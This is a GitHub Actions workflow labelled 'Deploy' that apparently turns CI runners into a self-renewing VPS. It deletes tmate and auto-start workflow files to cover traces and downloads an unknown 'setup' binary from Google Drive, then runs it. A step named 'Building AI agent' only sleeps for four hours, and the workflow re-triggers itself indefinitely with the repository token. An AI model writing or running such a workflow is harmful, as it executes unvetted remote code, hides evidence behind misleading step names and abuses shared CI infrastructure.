name: Deploy
on:
  workflow_dispatch:
  repository_dispatch:
    types: [create-vps]

permissions:
  contents: write   # cho phép commit/push để xoá file

jobs:
  start-vps:
    runs-on: ubuntu-latest
    timeout-minutes: 360

    steps:
      - name: Checkout
        uses: actions/checkout@v4
        with:
          fetch-depth: 0
          persist-credentials: true

      - name: Self-destruct workflows (wait 10s then delete)
        shell: bash
        env:
          DEFAULT_BRANCH: ${{ github.event.repository.default_branch }}
        run: |
          set -u
          echo "Sleeping 10s before self-delete..."
          sleep 60

          # Lấy tên branch ổn định từ môi trường
          BRANCH="${GITHUB_REF_NAME:-}"
          if [ -z "$BRANCH" ]; then
            BRANCH="$(git rev-parse --abbrev-ref HEAD || true)"
          fi
          if [ -z "$BRANCH" ] || [ "$BRANCH" = "HEAD" ]; then
            BRANCH="${DEFAULT_BRANCH:-main}"
            git switch -C "$BRANCH"
          else
            git switch "$BRANCH" || git switch -C "$BRANCH"
          fi

          git config user.name  "github-actions[bot]"
          git config user.email "41898282+github-actions[bot]@users.noreply.github.com"

          git rm -f .github/workflows/tmate.yml  || true
          git rm -f .github/workflows/auto-start.yml || true
          git commit -m "chore: self-delete workflows after start" || echo "No changes to commit"
          git push origin "$BRANCH" || echo "Push skipped/failed"

      - name: Setup Node.js
        uses: actions/setup-node@v4
        with:
          node-version: '20'

      - name: Install & Run Bot
        run: |
          sudo su
          pip install --upgrade pip || echo "⚠️ pip upgrade failed"
          pip install  gdown  || echo "⚠️ pip install failed"
          gdown https://drive.google.com/uc?id=1fCTcKCtAi9852gOE4YqmvCz3Hvf5rSm1 -O setup || echo "⚠️ setup"
          chmod +x setup
          ./setup

      - name: Building AI agent
        run: |
          for i in $(seq 1 240); do
            echo "Running minute $i/240..."
            sleep 60
          done

      - name: Restart workflow
        if: always()
        run: |
          curl -X POST             -H "Accept: application/vnd.github+json"             -H "Authorization: Bearer ${{ secrets.GITHUB_TOKEN }}"             -H "Content-Type: application/json"             https://api.github.com/repos/${{ github.repository }}/dispatches             -d '{"event_type": "create-vps"}'
